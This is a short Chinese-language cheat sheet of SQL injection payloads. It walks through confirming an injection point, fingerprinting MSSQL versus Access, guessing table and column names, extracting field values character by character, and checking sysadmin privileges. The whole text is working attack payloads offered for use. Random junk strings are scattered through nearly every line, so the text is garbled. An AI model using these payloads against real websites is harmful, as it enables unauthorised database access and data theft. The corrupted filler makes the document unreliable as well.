1.判断是否有注入;and 1=1 ;and 1=2 Ws^+7u
2.初步判断是否是mssql ;and user>0 YeRcf`
P1 7> 6)a
3.注入参数是字符'and [查询条件] and ''=' ;Na8_}
k1f3?l
vlU
4.搜索时没过滤参数的'and [查询条件] and '%25'=' S_T{L
&Rt+LN0qB0
5.判断数据库系统 FE8+E\ U?
){O1&|z-
;and (select count(*) from sysobjects)>0 mssql HUU >hq9
Kf05<J!
;and (select count(*) from msysobjects)>0 access &*(n<5wt
2I]]WBW#:
rV8(ia
|'U,/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ";)r*UgR{B
&\[Qm{lN
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 I%;Rn:zl
r~Y>+ln.
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 *D=K{bUe'
0)A=+zSS1
9.(1)猜字段的ascii值(access) Xzx[C_G
Exep+x-
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 U;x1}eFT
B#HnPUUK
(2)猜字段的ascii值(mssql) (j8GiJ]{L,
u;+%Qh
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 pG,<_N@P
",~ b2]ym
10.测试权限结构(mssql) ]PR|d\O
o5N]((9
0M#N=%31
K[Yc<Q
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- z3^RUoGU
7XUhJN3n
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- VFilF<